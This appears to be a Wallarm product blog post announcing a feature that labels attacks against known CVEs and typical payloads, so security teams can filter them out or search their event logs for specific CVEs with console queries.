Attacks against known vulnerabilities are one of the most common security risks. Have you seen an updated OWASP Top-10? A risk that used to be A09 Using Components with Known Vulnerabilities is now titled A06:2021-Vulnerable and Outdated Components. This category moved up to #06 from #9 in 2017. We highlighted this in our OWASP Top 10 2021 proposal that we published earlier this year.
We all know: patch management is hard. For many reasons: backward compatibility, code refactoring overheads, testing, legacy code. Patches and updates are just hard to apply on time. A kind of challenge where WAFs and API Security Platform products can be a perfect solution with their attack detection capabilities, virtual patches, and proactive vulnerability detection capabilities.
Known attacks vs. unknown attacks
Wallarm introduces the new feature to highlight known attacks:
- Attacks against known vulnerabilities and CVEs that are associated with them.
- Typical payloads and attack vectors that our team already saw in the wild.
By using new filters, you can filter out all the known attacks for your analysis that drastically decreases the number of events for analysis. You can exclude events that are more likely to be mass scanning and random testing and instead focus on some unique events and unusual attacks. It’s also a great way to identify any potential false positives as it’s highly unlikely that the output for the known attacks would have any of them. Just use this attack query to exclude all the typical/known attacks and get only unusual events:
- attacks today !known
For example, one of our customers had ~1K attacks for the last 7 days — but only 12 events that were not relying on the typical tooling/CVEs/scanning. A huge difference in the amount of data to analyze.
Or another use case. Suppose you learn about some new CVE that is relevant to your tech stack. In that case, you can also instantly run a search query and check if there have been any exploitation attempts against your applications.
New feature is already deployed for the whole customer base. No updates and additional configuration are required.
See it in action
These are some examples of usage.
Chose between searching of all events, known or unknown attacks
- All attacks – see all the results
- Known attacks (CVE) – attacks that are known to target CVEs or has typical payloads
- Other attacks – not known attacks to keep 0days and potentially false positives
Search attacks by CVE
You can search for the attacks that use some particular CVE:
- attacks today known CVE-2021-41773
Or if you like, find all the events that are related to any known CVE by using known cve keywords:
- attacks today known cve
The Wallarm team has added more than 1500 recent CVEs to the list and keeps updating the database every day. One of the objectives is that the team has to analyze all the new CVEs and introduce filters as soon as the public data on the CVE is published. Wallarm team also enumerates vulnerabilities backward by analysis of real attacks data to add filters for more known attacks and payloads seen in the wild.